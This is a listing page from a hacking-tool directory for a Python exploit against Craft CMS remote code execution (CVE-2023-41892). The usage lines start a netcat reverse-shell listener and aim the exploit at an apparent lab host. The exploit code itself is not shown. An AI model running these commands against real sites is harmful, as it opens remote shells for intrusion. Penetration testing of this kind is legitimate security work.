Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Craft-CMS-Exploit — Python exploit for Craft CMS CVE-2023-41892 Remote Code Execution vulnerability, delivering a PHP reverse shell for authorized penetration testing. | Kitploit
Tools/GitHubGitHub/diegaccio/craft-cms-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubdiegaccio/craft-cms-exploit

Craft-CMS-Exploit

Python exploit for Craft CMS CVE-2023-41892 Remote Code Execution vulnerability, delivering a PHP reverse shell for authorized penetration testing.

View Repository
522 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

This python script exploits the Remote Code Execution vulnerability (CVE-2023-41892) of the Craft CMS, which is a popular content management system. Versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability allowing attackers to execute arbitrary code remotely, like a PHP reverse shell.

Usage

First start a netcat listener in another shell:

nc -nlvp 1234

Then check your ip address and run the exploit:

python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb

Happy hacking with your brand new reverse shell!

Disclaimer

This code is intended for ethical hacking purposes only and should not be used for any malicious activities!

References

Thanks to to016 for the original code than can be found in this Gist

Download Tool